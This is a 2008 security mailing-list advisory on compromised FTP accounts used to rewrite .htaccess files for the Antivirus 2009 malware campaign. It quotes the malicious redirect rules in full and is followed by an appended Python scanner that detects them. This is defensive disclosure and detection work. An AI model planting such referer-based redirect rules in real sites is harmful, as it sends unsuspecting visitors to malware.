[nsp-sec] Antivirus 2009, Compromised FTP account and modified .htaccess files - paging Earthlink and STARNETMD
Nicholas Ianelli
ni at cert.org
Wed Oct 8 16:09:07 EDT 2008
So check this out, I just received word on what appears to be a mass
automated exploitation of compromised FTP accounts in an attempt to
modify any existing .htaccess files.
The attacks are sourced from the following networks:
209.178.141.39
87.248.180.0/24
4355 | 209.178.141.39 | ERMS-EARTHLNK - EARTHLINK, INC.
31252 | 87.248.180.0 | STARNET-AS SC StarNet SRL
peer-whois.cymru.com [2008-10-08 20:08:20 +0000]
174 | 209.178.141.39 | COGENT Cogent/PSI
2516 | 209.178.141.39 | KDDI KDDI CORPORATION
2914 | 87.248.180.0 | NTT-COMMUNICATIONS-2914 - NTT America, Inc.
3356 | 209.178.141.39 | LEVEL3 Level 3 Communications
4565 | 209.178.141.39 | MEGAPATH2-US - MegaPath Networks Inc.
7132 | 209.178.141.39 | SBIS-AS - AT&T Internet Services
8708 | 87.248.180.0 | RDSNET RCS & RDS S.A.
10310 | 209.178.141.39 | YAHOO-1 - Yahoo!
11164 | 209.178.141.39 | TRANSITRAIL - National LambdaRail, LLC
Modified .htaccess files look like this:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.200/in.html?s=sb [R,L]
Errordocument 404 http://89.28.13.200/in.html?s=sb_err
This appears to be in relation to Antivirus 2009, which is a really nasty
piece of malware that modifies System Restore points and Desktop properties
and installs additional pieces of malicious code.
You may wish to check for flows from the above IPs and see if you have
any modified .htaccess files.
Cheers,
Nick
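The check suggested above (look for modified .htaccess files) can be scripted. The following is an added example, not part of the original post or any tool: it scans .htaccess text for the pattern shown in the message, a chain of RewriteCond lines on HTTP_REFERER matching search-engine names followed by a RewriteRule or ErrorDocument that sends visitors to an off-site URL, and reports each hit. The sample input is the .htaccess fragment from the post; the function and variable names are my own.

```python
"""Flag .htaccess files carrying a search-engine-referer redirect off-site."""
from ipaddress import ip_address
from typing import List, Optional
from urllib.parse import urlparse

SEARCH_ENGINES = ("google", "aol", "msn", "altavista", "ask", "yahoo")

# Sample taken from the post above (the modified .htaccess the message quotes).
SAMPLE = "\n".join([
    "RewriteEngine On",
    "RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]",
    "RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]",
    "RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]",
    "RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]",
    "RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]",
    "RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]",
    "RewriteRule .* http://89.28.13.200/in.html?s=sb [R,L]",
    "Errordocument 404 http://89.28.13.200/in.html?s=sb_err",
])


def _external_host(arg: str) -> Optional[str]:
    """Return the hostname if arg is an absolute http(s) URL, else None."""
    if not arg.lower().startswith(("http://", "https://")):
        return None
    return urlparse(arg).hostname


def _is_bare_ip(host: str) -> bool:
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def scan_htaccess(text: str) -> List[str]:
    """Return one finding per suspicious directive (empty list if clean)."""
    findings = []
    referer_conds = 0  # search-engine RewriteConds pending for the next rule
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.strip().split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()  # Apache directive names are case-insensitive
        if directive == "rewritecond" and len(parts) >= 3:
            if "HTTP_REFERER" in parts[1].upper() and any(
                    e in parts[2].lower() for e in SEARCH_ENGINES):
                referer_conds += 1
        elif directive == "rewriterule" and len(parts) >= 3:
            host = _external_host(parts[2])
            if host and referer_conds:
                tag = " (bare IP)" if _is_bare_ip(host) else ""
                findings.append(f"line {lineno}: search-engine referer redirect to {host}{tag}")
            referer_conds = 0  # RewriteCond lines bind only to the next RewriteRule
        elif directive == "errordocument" and len(parts) >= 3:
            host = _external_host(parts[2])
            if host:
                findings.append(f"line {lineno}: ErrorDocument {parts[1]} points off-site to {host}")
    return findings
```

Run it over every .htaccess under a web root (e.g. `find /var/www -name .htaccess`) and review any file that yields findings against what the site owner actually deployed.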